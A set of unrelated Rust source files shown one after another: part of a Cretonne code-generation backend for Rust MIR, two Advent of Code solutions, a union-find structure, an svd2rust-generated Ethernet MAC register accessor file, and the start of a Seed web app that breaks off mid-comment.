                        ConstVal::Integral(ConstInt::Isize(ConstIsize::Is32(val))) |
                        ConstVal::Integral(ConstInt::I32(val)) => {
                            self.builder.ins().iconst(
                                cretonne::ir::types::I32,
                                val as i64,
                            )
                        }
                        // TODO: Since we're at the wasm32 stage, and until wasm64, it's
                        // probably best if isize is always i32 ?
                        ConstVal::Integral(ConstInt::Isize(ConstIsize::Is64(val))) => {
                            self.builder.ins().iconst(cretonne::ir::types::I64, val)
                        }
                        ConstVal::Integral(ConstInt::I64(val)) => {
                            self.builder.ins().iconst(cretonne::ir::types::I64, val)
                        }
                        ConstVal::Bool(val) => {
                            self.builder.ins().bconst(cretonne::ir::types::B1, val)
                        }
                        _ => panic!("unimplemented value: {:?}", value),
                    }
                }
                Literal::Promoted { .. } => panic!("unimplemented Promoted Literal: {:?}", c),
                _ => panic!("unimplemented Constant Literal {:?}", c),
            }
        }
    }
}
// Imported from miri and slightly modified to adapt to our monomorphize api
fn type_layout_with_substs(&self, ty: Ty<'tcx>, substs: &Substs<'tcx>) -> &'tcx Layout {
// TODO: Is this inefficient? Needs investigation.
let ty = monomorphize::apply_substs(self.tcx, substs, &ty);
self.tcx.infer_ctxt().enter(|infcx| {
// TODO: Report this error properly.
let param_env = ty::ParamEnv::empty(Reveal::All);
ty.layout(self.tcx, param_env).unwrap()
})
}
#[inline]
fn type_size(&self, ty: Ty<'tcx>) -> usize {
let substs = Substs::empty();
self.type_size_with_substs(ty, substs)
}
    // Imported from miri
    /// Size in bytes of `ty` after applying `substs`, via its layout.
    #[inline]
    fn type_size_with_substs(&self, ty: Ty<'tcx>, substs: &'tcx Substs<'tcx>) -> usize {
        // `bytes()` is cast to usize — assumes the size fits the host word.
        self.type_layout_with_substs(ty, substs)
            .size(&self.tcx.data_layout)
            .bytes() as usize
    }
#[inline]
fn type_layout(&self, ty: Ty<'tcx>) -> &'tcx Layout {
let substs = Substs::empty();
self.type_layout_with_substs(ty, substs)
}
}
/// Maps a scalar Rust type onto the corresponding Cretonne value type.
/// Zero-sized types (unit, never) yield `None`; anything else unsupported
/// panics.
fn rust_ty_to_cretonne(t: Ty) -> Option<cretonne::ir::Type> {
    use cretonne::ir::types;
    // FIXME zero-sized-types
    if t.is_nil() || t.is_never() {
        return None;
    }
    let cton_ty = match t.sty {
        ty::TyFloat(FloatTy::F32) => types::F32,
        ty::TyFloat(FloatTy::F64) => types::F64,
        ty::TyInt(IntTy::I32) | ty::TyUint(UintTy::U32) => types::I32,
        ty::TyInt(IntTy::I64) | ty::TyUint(UintTy::U64) => types::I64,
        _ => panic!("unsupported type {}", t.sty),
    };
    Some(cton_ty)
}
/// Rewrites `s` into a valid symbol name by replacing the characters
/// `<angle brackets>`, spaces and `(parentheses)` with underscores.
fn sanitize_symbol(s: &str) -> String {
    let mut out = String::with_capacity(s.len());
    for c in s.chars() {
        match c {
            '<' | '>' | ' ' | '(' | ')' => out.push('_'),
            other => out.push(other),
        }
    }
    out
}
// How a call target is resolved when emitting a Cretonne call.
// NOTE(review): semantics inferred from variant names — confirm at use sites.
#[derive(Debug)]
enum CretonneCallKind {
    Direct,
    Import, // Indirect // unimplemented at the moment
}
// A block either falls through normally or is entered via a switch on the
// carried value.
enum CretonneBlockKind {
    Default,
    Switch(cretonne::ir::Value),
}
// Index identifying a Cretonne variable/local.
type CretonneIndex = u32;
// Where a translated MIR lvalue lives: Cretonne variable `index`, optionally
// accessed at a byte `offset` within it (for field/downcast projections).
#[derive(Copy, Clone, Debug, Eq, PartialEq)]
struct CretonneLvalue {
    index: CretonneIndex,
    // `None` means the variable is addressed directly, no load needed.
    offset: Option<u32>,
    extra: LvalueExtra,
}
impl CretonneLvalue {
    /// Builds an lvalue descriptor from its parts.
    fn new(index: CretonneIndex, offset: Option<u32>, extra: LvalueExtra) -> Self {
        // Field-init shorthand; behavior unchanged.
        CretonneLvalue { index, offset, extra }
    }

    /// Returns a copy of `self` with `offset` added on top of any offset
    /// already accumulated (projections can nest).
    fn offset(&self, offset: u32) -> Self {
        let combined = Some(self.offset.map_or(offset, |base| base + offset));
        Self::new(self.index, combined, self.extra)
    }
}
// The following is imported from miri as well
// Extra information carried alongside an lvalue beyond index/offset.
#[derive(Copy, Clone, Debug, Eq, PartialEq)]
enum LvalueExtra {
    None,
    // Length(u64),
    // TODO: Vtable(memory::AllocId),
    // Records which enum variant a Downcast projection selected.
    DowncastVariant(usize),
}
// Extension trait mapping a layout integer width to its storage `Size`.
trait IntegerExt {
    fn size(self) -> Size;
}
impl IntegerExt for layout::Integer {
    fn size(self) -> Size {
        use rustc::ty::layout::Integer::*;
        match self {
            // A 1-bit integer (I1) is widened to a full byte here.
            I1 | I8 => Size::from_bits(8),
            I16 => Size::from_bits(16),
            I32 => Size::from_bits(32),
            I64 => Size::from_bits(64),
            I128 => panic!("i128 is not yet supported"),
        }
    }
}
|
use std::mem;
use std::env;
use super::file_loader;
pub fn run(part: i32) {
let input = file_loader::load_file("2.input");
println!("File content: {:?}", input);
let intcode: Vec<u32> = input.split(",")
.map(|number| number.parse::<u32>().unwrap())
.collect();
if part == 1 {
let args: Vec<String> = env::args().collect();
let noun = args[3].parse::<u32>().expect("Should provide noun");
let verb = args[4].parse::<u32>().expect("Should provide verb");
let result = process_for_result(intcode.to_vec(), noun, verb);
println!();
println!("Answer is {}", result);
} else {
'outer: for i in 30..60 {
'inner: for j in 30..50 {
let result = process_for_result(intcode.to_vec(), i, j);
println!("Result for n {} and v {} is {}", i, j, result);
if result == 19690720 {
println!();
println!("Answer is {}", 100 * i + j);
break 'outer;
}
}
}
}
}
/// Runs the intcode program to completion after patching in `noun` and
/// `verb` at positions 1 and 2, returning the value left at position 0.
fn process_for_result(mut intcode: Vec<u32>, noun: u32, verb: u32) -> u32 {
    intcode[1] = noun;
    intcode[2] = verb;
    let mut ptr: usize = 0;
    // BUG FIX: check for the halt opcode *before* dispatching, so a program
    // whose current instruction is 99 halts cleanly instead of panicking in
    // `process_next_number` ("Unknown opcode 99").
    while intcode[ptr] != 99 {
        process_next_number(&mut intcode, &mut ptr);
    }
    intcode[0]
}

/// Dispatches the opcode at `*ptr`; each handler advances the pointer.
///
/// Panics on any opcode other than 1 (add) or 2 (multiply).
fn process_next_number(run: &mut Vec<u32>, ptr: &mut usize) {
    let opcode = run[*ptr];
    match opcode {
        1 => add(run, ptr),
        2 => multiply(run, ptr),
        _ => panic!("Unknown opcode {}. Something went wrong", opcode)
    }
}

/// Opcode 1: run[run[p+3]] = run[run[p+1]] + run[run[p+2]] (positional mode).
fn add(run: &mut Vec<u32>, ptr: &mut usize) {
    let one: usize = run[*ptr + 1] as usize;
    let two: usize = run[*ptr + 2] as usize;
    let answer: usize = run[*ptr + 3] as usize;
    // Plain assignment replaces the old `mem::replace` whose return value
    // was discarded anyway.
    run[answer] = run[one] + run[two];
    // Skip over this 4-word instruction.
    *ptr += 4;
}

/// Opcode 2: run[run[p+3]] = run[run[p+1]] * run[run[p+2]] (positional mode).
fn multiply(run: &mut Vec<u32>, ptr: &mut usize) {
    let one: usize = run[*ptr + 1] as usize;
    let two: usize = run[*ptr + 2] as usize;
    let answer: usize = run[*ptr + 3] as usize;
    run[answer] = run[one] * run[two];
    *ptr += 4;
}
use lazy_static::lazy_static;
use regex::Regex;
use std::collections::HashMap;
use util::*;
lazy_static! {
    // Parses one rule line: the outer bag color plus the raw (possibly
    // empty) list of contained bags.
    static ref RE: Regex = Regex::new(
        r"(?P<color>[a-z]+ [a-z]+) bags contain (?P<children>([0-9]+ [a-z]+ [a-z]+ bags?(, )?)*)."
    )
    .unwrap();
    // Parses one child entry, e.g. "3 muted yellow bags".
    static ref RE_CHILDREN: Regex =
        Regex::new(r"(?P<count>[0-9]+) (?P<color>[a-z]+ [a-z]+) bags?").unwrap();
}
/// AoC day 7 part 1: counts the bag colors (other than shiny gold itself)
/// that can eventually contain a shiny gold bag.
fn main() -> Result<(), Box<dyn std::error::Error>> {
    let timer = Timer::new();
    // First CLI argument is the input file path.
    let input = input::lines::<String>(&std::env::args().nth(1).unwrap());
    let bags: HashMap<String, Vec<(u32, String)>> = input.iter().map(parse).collect();
    let mut count = 0;
    // Iterate keys directly (the old `(color, _)` destructure discarded the
    // value, and `&color` passed a needless double reference).
    for color in bags.keys() {
        if color != "shiny gold" && contains_golden(color, &bags) {
            count += 1;
        }
    }
    timer.print();
    println!("{}", count);
    Ok(())
}
/// Parses one rule line into `(outer color, [(count, inner color), ...])`.
/// A bag that contains nothing yields an empty child list.
fn parse(line: &String) -> (String, Vec<(u32, String)>) {
    let cap = RE.captures(line).unwrap();
    let color = cap["color"].to_owned();
    let contains = match cap.name("children") {
        Some(children) => children
            .as_str()
            .split_terminator(", ")
            .map(|c| {
                let child_cap = RE_CHILDREN.captures(c).unwrap();
                (child_cap["count"].parse().unwrap(), child_cap["color"].to_owned())
            })
            .collect(),
        None => Vec::new(),
    };
    (color, contains)
}
/// True if `color` is shiny gold or (transitively) contains a shiny gold bag.
/// Panics if `color` is not a key of `bags`.
fn contains_golden(color: &String, bags: &HashMap<String, Vec<(u32, String)>>) -> bool {
    color == "shiny gold"
        || bags
            .get(color)
            .unwrap()
            .iter()
            .any(|(_, child)| contains_golden(child, bags))
}
|
// use std::vec::Vec;
use std::collections::hash_map::HashMap;
use std::hash::Hash;
// use std::ops::Deref;
// use std::ops::Index;
// use core::iter::FromIterator;
/// Union-find (disjoint sets) over arbitrary hashable values, using
/// union-by-size and path halving.
pub struct DisjSets<T> {
    parent: Vec<usize>,     // parent[i] == i marks a root
    size: Vec<i32>,         // element count of the tree rooted at i
    idx: HashMap<T, usize>, // maps a value to its slot in parent/size
}

/// Follows parent links from `x` to its root, halving the path as it goes
/// (each visited node is re-pointed at its grandparent).
/// Takes a slice (the old `&mut Vec<usize>` parameter was needlessly
/// specific; callers passing `&mut Vec` still coerce).
fn root_inner(parent: &mut [usize], x: usize) -> usize {
    let mut i = x;
    while i != parent[i] {
        let prev = i;
        i = parent[i];
        parent[prev] = parent[i];
    }
    i
}

impl<T> DisjSets<T>
where
    T: Hash + Eq + Clone + core::fmt::Debug,
{
    /// Creates an empty forest.
    pub fn new() -> DisjSets<T> {
        DisjSets {
            parent: Vec::new(),
            size: Vec::new(),
            idx: HashMap::new(),
        }
    }

    /// Returns the slot for `x`, allocating a fresh singleton set on first use.
    fn get_index(&mut self, x: &T) -> usize {
        if let Some(i) = self.idx.get(x) {
            *i
        } else {
            let i = self.parent.len();
            self.parent.push(i);
            self.size.push(1);
            self.idx.insert((*x).clone(), i);
            i
        }
    }

    /// Returns the representative slot of the set containing `x`.
    fn root(&mut self, x: &T) -> usize {
        let i = self.get_index(x);
        root_inner(&mut self.parent, i)
    }

    /// Unions the sets containing `x` and `y` (no-op if already joined).
    pub fn merge(&mut self, x: &T, y: &T) {
        let mut i = self.root(x);
        let mut j = self.root(y);
        if i == j {
            return;
        }
        // Union by size: attach the smaller tree under the larger root.
        if self.size[i] < self.size[j] {
            std::mem::swap(&mut i, &mut j)
        }
        self.parent[j] = i;
        self.size[i] = self.size[i] + self.size[j];
        let i2 = self.get_index(x);
        let j2 = self.get_index(y);
        // BUG FIX: `assert!(cond, format!(...))` passed a pre-built String as
        // the panic payload, which is a hard error in the 2021 edition —
        // `assert!` takes the format string and arguments directly.
        assert!(
            self.same_set(x, y),
            "{:?} ({}, {}), {:?} ({}, {}), - {:?}",
            x, i, i2, y, j, j2, self.parent
        )
    }

    /// True if `x` and `y` currently belong to the same set.
    pub fn same_set(&mut self, x: &T, y: &T) -> bool {
        let i = self.root(x);
        let j = self.root(y);
        i == j
    }

    /// Groups every known value by its set and returns the groups
    /// (in arbitrary order).
    pub fn list_sets(&mut self) -> Vec<Vec<T>> {
        let mut h: HashMap<usize, Vec<T>> = HashMap::new();
        for (x, i) in &self.idx {
            let j = root_inner(&mut self.parent, *i);
            // Entry API replaces the old get_mut/insert two-step.
            h.entry(j).or_insert_with(Vec::new).push(x.clone());
        }
        h.drain().map(|(_, v)| v).collect()
    }
}
|
// svd2rust-generated accessors for MACCR ("Operating mode configuration
// register" — the field names suggest an Ethernet MAC; confirm in the
// device reference manual). Generated code: do not hand-edit.
#[doc = "Register `MACCR` reader"]
pub type R = crate::R<MACCR_SPEC>;
#[doc = "Register `MACCR` writer"]
pub type W = crate::W<MACCR_SPEC>;
// One `*_R` reader and one `*_W` writer proxy per field. `FieldWriter`'s
// first const generic is the field width in bits; `O` is the bit offset,
// pinned at the call sites in `impl W` below.
#[doc = "Field `RE` reader - Receiver Enable"]
pub type RE_R = crate::BitReader;
#[doc = "Field `RE` writer - Receiver Enable"]
pub type RE_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `TE` reader - Transmitter Enable"]
pub type TE_R = crate::BitReader;
#[doc = "Field `TE` writer - Transmitter Enable"]
pub type TE_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `PRELEN` reader - Preamble Length for Transmit Packets"]
pub type PRELEN_R = crate::FieldReader;
#[doc = "Field `PRELEN` writer - Preamble Length for Transmit Packets"]
pub type PRELEN_W<'a, REG, const O: u8> = crate::FieldWriter<'a, REG, 2, O>;
#[doc = "Field `DC` reader - Deferral Check"]
pub type DC_R = crate::BitReader;
#[doc = "Field `DC` writer - Deferral Check"]
pub type DC_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `BL` reader - Back-Off Limit"]
pub type BL_R = crate::FieldReader;
#[doc = "Field `BL` writer - Back-Off Limit"]
pub type BL_W<'a, REG, const O: u8> = crate::FieldWriter<'a, REG, 2, O>;
#[doc = "Field `DR` reader - Disable Retry"]
pub type DR_R = crate::BitReader;
#[doc = "Field `DR` writer - Disable Retry"]
pub type DR_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `DCRS` reader - Disable Carrier Sense During Transmission"]
pub type DCRS_R = crate::BitReader;
#[doc = "Field `DCRS` writer - Disable Carrier Sense During Transmission"]
pub type DCRS_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `DO` reader - Disable Receive Own"]
pub type DO_R = crate::BitReader;
#[doc = "Field `DO` writer - Disable Receive Own"]
pub type DO_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `ECRSFD` reader - Enable Carrier Sense Before Transmission in Full-Duplex Mode"]
pub type ECRSFD_R = crate::BitReader;
#[doc = "Field `ECRSFD` writer - Enable Carrier Sense Before Transmission in Full-Duplex Mode"]
pub type ECRSFD_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `LM` reader - Loopback Mode"]
pub type LM_R = crate::BitReader;
#[doc = "Field `LM` writer - Loopback Mode"]
pub type LM_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `DM` reader - Duplex Mode"]
pub type DM_R = crate::BitReader;
#[doc = "Field `DM` writer - Duplex Mode"]
pub type DM_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `FES` reader - MAC Speed"]
pub type FES_R = crate::BitReader;
#[doc = "Field `FES` writer - MAC Speed"]
pub type FES_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `JE` reader - Jumbo Packet Enable"]
pub type JE_R = crate::BitReader;
#[doc = "Field `JE` writer - Jumbo Packet Enable"]
pub type JE_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `JD` reader - Jabber Disable"]
pub type JD_R = crate::BitReader;
#[doc = "Field `JD` writer - Jabber Disable"]
pub type JD_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `WD` reader - Watchdog Disable"]
pub type WD_R = crate::BitReader;
#[doc = "Field `WD` writer - Watchdog Disable"]
pub type WD_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `ACS` reader - Automatic Pad or CRC Stripping"]
pub type ACS_R = crate::BitReader;
#[doc = "Field `ACS` writer - Automatic Pad or CRC Stripping"]
pub type ACS_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `CST` reader - CRC stripping for Type packets"]
pub type CST_R = crate::BitReader;
#[doc = "Field `CST` writer - CRC stripping for Type packets"]
pub type CST_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `S2KP` reader - IEEE 802.3as Support for 2K Packets"]
pub type S2KP_R = crate::BitReader;
#[doc = "Field `S2KP` writer - IEEE 802.3as Support for 2K Packets"]
pub type S2KP_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `GPSLCE` reader - Giant Packet Size Limit Control Enable"]
pub type GPSLCE_R = crate::BitReader;
#[doc = "Field `GPSLCE` writer - Giant Packet Size Limit Control Enable"]
pub type GPSLCE_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `IPG` reader - Inter-Packet Gap"]
pub type IPG_R = crate::FieldReader;
#[doc = "Field `IPG` writer - Inter-Packet Gap"]
pub type IPG_W<'a, REG, const O: u8> = crate::FieldWriter<'a, REG, 3, O>;
#[doc = "Field `IPC` reader - Checksum Offload"]
pub type IPC_R = crate::BitReader;
#[doc = "Field `IPC` writer - Checksum Offload"]
pub type IPC_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `SARC` reader - Source Address Insertion or Replacement Control"]
pub type SARC_R = crate::FieldReader;
#[doc = "Field `SARC` writer - Source Address Insertion or Replacement Control"]
pub type SARC_W<'a, REG, const O: u8> = crate::FieldWriter<'a, REG, 3, O>;
#[doc = "Field `ARPEN` reader - ARP Offload Enable"]
pub type ARPEN_R = crate::BitReader;
#[doc = "Field `ARPEN` writer - ARP Offload Enable"]
pub type ARPEN_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
// Read-side accessors: each method extracts one MACCR field from the cached
// register value. Bit positions follow the per-method docs; bits 7, 15 and
// 18 have no accessor — presumably reserved (confirm in the datasheet).
// Generated by svd2rust: do not hand-edit.
impl R {
    #[doc = "Bit 0 - Receiver Enable"]
    #[inline(always)]
    pub fn re(&self) -> RE_R {
        RE_R::new((self.bits & 1) != 0)
    }
    #[doc = "Bit 1 - Transmitter Enable"]
    #[inline(always)]
    pub fn te(&self) -> TE_R {
        TE_R::new(((self.bits >> 1) & 1) != 0)
    }
    #[doc = "Bits 2:3 - Preamble Length for Transmit Packets"]
    #[inline(always)]
    pub fn prelen(&self) -> PRELEN_R {
        PRELEN_R::new(((self.bits >> 2) & 3) as u8)
    }
    #[doc = "Bit 4 - Deferral Check"]
    #[inline(always)]
    pub fn dc(&self) -> DC_R {
        DC_R::new(((self.bits >> 4) & 1) != 0)
    }
    #[doc = "Bits 5:6 - Back-Off Limit"]
    #[inline(always)]
    pub fn bl(&self) -> BL_R {
        BL_R::new(((self.bits >> 5) & 3) as u8)
    }
    #[doc = "Bit 8 - Disable Retry"]
    #[inline(always)]
    pub fn dr(&self) -> DR_R {
        DR_R::new(((self.bits >> 8) & 1) != 0)
    }
    #[doc = "Bit 9 - Disable Carrier Sense During Transmission"]
    #[inline(always)]
    pub fn dcrs(&self) -> DCRS_R {
        DCRS_R::new(((self.bits >> 9) & 1) != 0)
    }
    #[doc = "Bit 10 - Disable Receive Own"]
    #[inline(always)]
    pub fn do_(&self) -> DO_R {
        // Trailing underscore avoids colliding with the reserved keyword `do`.
        DO_R::new(((self.bits >> 10) & 1) != 0)
    }
    #[doc = "Bit 11 - Enable Carrier Sense Before Transmission in Full-Duplex Mode"]
    #[inline(always)]
    pub fn ecrsfd(&self) -> ECRSFD_R {
        ECRSFD_R::new(((self.bits >> 11) & 1) != 0)
    }
    #[doc = "Bit 12 - Loopback Mode"]
    #[inline(always)]
    pub fn lm(&self) -> LM_R {
        LM_R::new(((self.bits >> 12) & 1) != 0)
    }
    #[doc = "Bit 13 - Duplex Mode"]
    #[inline(always)]
    pub fn dm(&self) -> DM_R {
        DM_R::new(((self.bits >> 13) & 1) != 0)
    }
    #[doc = "Bit 14 - MAC Speed"]
    #[inline(always)]
    pub fn fes(&self) -> FES_R {
        FES_R::new(((self.bits >> 14) & 1) != 0)
    }
    #[doc = "Bit 16 - Jumbo Packet Enable"]
    #[inline(always)]
    pub fn je(&self) -> JE_R {
        JE_R::new(((self.bits >> 16) & 1) != 0)
    }
    #[doc = "Bit 17 - Jabber Disable"]
    #[inline(always)]
    pub fn jd(&self) -> JD_R {
        JD_R::new(((self.bits >> 17) & 1) != 0)
    }
    #[doc = "Bit 19 - Watchdog Disable"]
    #[inline(always)]
    pub fn wd(&self) -> WD_R {
        WD_R::new(((self.bits >> 19) & 1) != 0)
    }
    #[doc = "Bit 20 - Automatic Pad or CRC Stripping"]
    #[inline(always)]
    pub fn acs(&self) -> ACS_R {
        ACS_R::new(((self.bits >> 20) & 1) != 0)
    }
    #[doc = "Bit 21 - CRC stripping for Type packets"]
    #[inline(always)]
    pub fn cst(&self) -> CST_R {
        CST_R::new(((self.bits >> 21) & 1) != 0)
    }
    #[doc = "Bit 22 - IEEE 802.3as Support for 2K Packets"]
    #[inline(always)]
    pub fn s2kp(&self) -> S2KP_R {
        S2KP_R::new(((self.bits >> 22) & 1) != 0)
    }
    #[doc = "Bit 23 - Giant Packet Size Limit Control Enable"]
    #[inline(always)]
    pub fn gpslce(&self) -> GPSLCE_R {
        GPSLCE_R::new(((self.bits >> 23) & 1) != 0)
    }
    #[doc = "Bits 24:26 - Inter-Packet Gap"]
    #[inline(always)]
    pub fn ipg(&self) -> IPG_R {
        IPG_R::new(((self.bits >> 24) & 7) as u8)
    }
    #[doc = "Bit 27 - Checksum Offload"]
    #[inline(always)]
    pub fn ipc(&self) -> IPC_R {
        IPC_R::new(((self.bits >> 27) & 1) != 0)
    }
    #[doc = "Bits 28:30 - Source Address Insertion or Replacement Control"]
    #[inline(always)]
    pub fn sarc(&self) -> SARC_R {
        SARC_R::new(((self.bits >> 28) & 7) as u8)
    }
    #[doc = "Bit 31 - ARP Offload Enable"]
    #[inline(always)]
    pub fn arpen(&self) -> ARPEN_R {
        ARPEN_R::new(((self.bits >> 31) & 1) != 0)
    }
}
// Write-side accessors: each method returns a field-writer proxy whose const
// generic argument pins the field's bit offset (matching the read side
// above); `bits` writes the raw register value. Generated by svd2rust:
// do not hand-edit.
impl W {
    #[doc = "Bit 0 - Receiver Enable"]
    #[inline(always)]
    #[must_use]
    pub fn re(&mut self) -> RE_W<MACCR_SPEC, 0> {
        RE_W::new(self)
    }
    #[doc = "Bit 1 - Transmitter Enable"]
    #[inline(always)]
    #[must_use]
    pub fn te(&mut self) -> TE_W<MACCR_SPEC, 1> {
        TE_W::new(self)
    }
    #[doc = "Bits 2:3 - Preamble Length for Transmit Packets"]
    #[inline(always)]
    #[must_use]
    pub fn prelen(&mut self) -> PRELEN_W<MACCR_SPEC, 2> {
        PRELEN_W::new(self)
    }
    #[doc = "Bit 4 - Deferral Check"]
    #[inline(always)]
    #[must_use]
    pub fn dc(&mut self) -> DC_W<MACCR_SPEC, 4> {
        DC_W::new(self)
    }
    #[doc = "Bits 5:6 - Back-Off Limit"]
    #[inline(always)]
    #[must_use]
    pub fn bl(&mut self) -> BL_W<MACCR_SPEC, 5> {
        BL_W::new(self)
    }
    #[doc = "Bit 8 - Disable Retry"]
    #[inline(always)]
    #[must_use]
    pub fn dr(&mut self) -> DR_W<MACCR_SPEC, 8> {
        DR_W::new(self)
    }
    #[doc = "Bit 9 - Disable Carrier Sense During Transmission"]
    #[inline(always)]
    #[must_use]
    pub fn dcrs(&mut self) -> DCRS_W<MACCR_SPEC, 9> {
        DCRS_W::new(self)
    }
    #[doc = "Bit 10 - Disable Receive Own"]
    #[inline(always)]
    #[must_use]
    pub fn do_(&mut self) -> DO_W<MACCR_SPEC, 10> {
        DO_W::new(self)
    }
    #[doc = "Bit 11 - Enable Carrier Sense Before Transmission in Full-Duplex Mode"]
    #[inline(always)]
    #[must_use]
    pub fn ecrsfd(&mut self) -> ECRSFD_W<MACCR_SPEC, 11> {
        ECRSFD_W::new(self)
    }
    #[doc = "Bit 12 - Loopback Mode"]
    #[inline(always)]
    #[must_use]
    pub fn lm(&mut self) -> LM_W<MACCR_SPEC, 12> {
        LM_W::new(self)
    }
    #[doc = "Bit 13 - Duplex Mode"]
    #[inline(always)]
    #[must_use]
    pub fn dm(&mut self) -> DM_W<MACCR_SPEC, 13> {
        DM_W::new(self)
    }
    #[doc = "Bit 14 - MAC Speed"]
    #[inline(always)]
    #[must_use]
    pub fn fes(&mut self) -> FES_W<MACCR_SPEC, 14> {
        FES_W::new(self)
    }
    #[doc = "Bit 16 - Jumbo Packet Enable"]
    #[inline(always)]
    #[must_use]
    pub fn je(&mut self) -> JE_W<MACCR_SPEC, 16> {
        JE_W::new(self)
    }
    #[doc = "Bit 17 - Jabber Disable"]
    #[inline(always)]
    #[must_use]
    pub fn jd(&mut self) -> JD_W<MACCR_SPEC, 17> {
        JD_W::new(self)
    }
    #[doc = "Bit 19 - Watchdog Disable"]
    #[inline(always)]
    #[must_use]
    pub fn wd(&mut self) -> WD_W<MACCR_SPEC, 19> {
        WD_W::new(self)
    }
    #[doc = "Bit 20 - Automatic Pad or CRC Stripping"]
    #[inline(always)]
    #[must_use]
    pub fn acs(&mut self) -> ACS_W<MACCR_SPEC, 20> {
        ACS_W::new(self)
    }
    #[doc = "Bit 21 - CRC stripping for Type packets"]
    #[inline(always)]
    #[must_use]
    pub fn cst(&mut self) -> CST_W<MACCR_SPEC, 21> {
        CST_W::new(self)
    }
    #[doc = "Bit 22 - IEEE 802.3as Support for 2K Packets"]
    #[inline(always)]
    #[must_use]
    pub fn s2kp(&mut self) -> S2KP_W<MACCR_SPEC, 22> {
        S2KP_W::new(self)
    }
    #[doc = "Bit 23 - Giant Packet Size Limit Control Enable"]
    #[inline(always)]
    #[must_use]
    pub fn gpslce(&mut self) -> GPSLCE_W<MACCR_SPEC, 23> {
        GPSLCE_W::new(self)
    }
    #[doc = "Bits 24:26 - Inter-Packet Gap"]
    #[inline(always)]
    #[must_use]
    pub fn ipg(&mut self) -> IPG_W<MACCR_SPEC, 24> {
        IPG_W::new(self)
    }
    #[doc = "Bit 27 - Checksum Offload"]
    #[inline(always)]
    #[must_use]
    pub fn ipc(&mut self) -> IPC_W<MACCR_SPEC, 27> {
        IPC_W::new(self)
    }
    #[doc = "Bits 28:30 - Source Address Insertion or Replacement Control"]
    #[inline(always)]
    #[must_use]
    pub fn sarc(&mut self) -> SARC_W<MACCR_SPEC, 28> {
        SARC_W::new(self)
    }
    #[doc = "Bit 31 - ARP Offload Enable"]
    #[inline(always)]
    #[must_use]
    pub fn arpen(&mut self) -> ARPEN_W<MACCR_SPEC, 31> {
        ARPEN_W::new(self)
    }
    #[doc = "Writes raw bits to the register."]
    #[inline(always)]
    pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
        self.bits = bits;
        self
    }
}
#[doc = "Operating mode configuration register\n\nYou can [`read`](crate::generic::Reg::read) this register and get [`maccr::R`](R). You can [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero) this register using [`maccr::W`](W). You can also [`modify`](crate::generic::Reg::modify) this register. See [API](https://docs.rs/svd2rust/#read--modify--write-api)."]
pub struct MACCR_SPEC;
impl crate::RegisterSpec for MACCR_SPEC {
    // MACCR is a 32-bit register.
    type Ux = u32;
}
#[doc = "`read()` method returns [`maccr::R`](R) reader structure"]
impl crate::Readable for MACCR_SPEC {}
#[doc = "`write(|w| ..)` method takes [`maccr::W`](W) writer structure"]
impl crate::Writable for MACCR_SPEC {
    // Both modify-bitmaps are zero: no field requires a fixed 0/1 to be
    // written during a read-modify-write cycle.
    const ZERO_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
    const ONE_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
}
#[doc = "`reset()` method sets MACCR to value 0"]
impl crate::Resettable for MACCR_SPEC {
    const RESET_VALUE: Self::Ux = 0;
}
|
// (Lines like the one below ignore selected Clippy rules
// - it's useful when you want to check your code with `cargo make verify`
// but some rules are too "annoying" or are not applicable for your case.)
#![allow(clippy::wildcard_imports)]
use seed::{prelude::*, *};
// ------ ------
// Init
// ------ ------
// `init` describes what should happen when your app started.
/// Builds the initial `Model` and immediately schedules `Msg::StartOver`,
/// which hides every section and replays the staggered intro animation.
fn init(_: Url, orders: &mut impl Orders<Msg>) -> Model {
    // Ids of the animated page sections, in display order.
    let elements = [
        "title".to_string(),
        "installable".to_string(),
        "offline".to_string(),
        "responsive".to_string(),
        "push".to_string(),
        "notifications".to_string(),
        "native-features".to_string(),
        "more".to_string(),
        "button".to_string(),
    ];
    let visible = elements
        .iter()
        .cloned()
        .map(|e| (e, true))
        .collect::<IndexMap<_, _>>();
    let toh = elements
        .iter()
        .cloned()
        .map(|e| (e, None))
        .collect::<IndexMap<_, _>>();
    let model = Model { visible, toh };
    orders.perform_cmd(async { Msg::StartOver });
    model
}
// ------ ------
// Model
// ------ ------
// `Model` describes our app state.
struct Model {
    // Whether each page section is currently shown, keyed by element id.
    visible: IndexMap<String, bool>,
    // One pending reveal-timer handle per element id (None when no timer).
    toh: IndexMap<String, Option<CmdHandle>>, //timeout handle hashmap
}
// ------ ------
// Update
// ------ ------
// `Msg` describes the different events you can modify state with.
enum Msg {
    // Hide all sections and replay the staggered intro animation.
    StartOver,
    // A section's reveal timer elapsed; payload is the element id.
    OnTimer(String),
}
// `update` describes how to handle each `Msg`.
/// Handles each `Msg`: `StartOver` hides every section and arms one timer
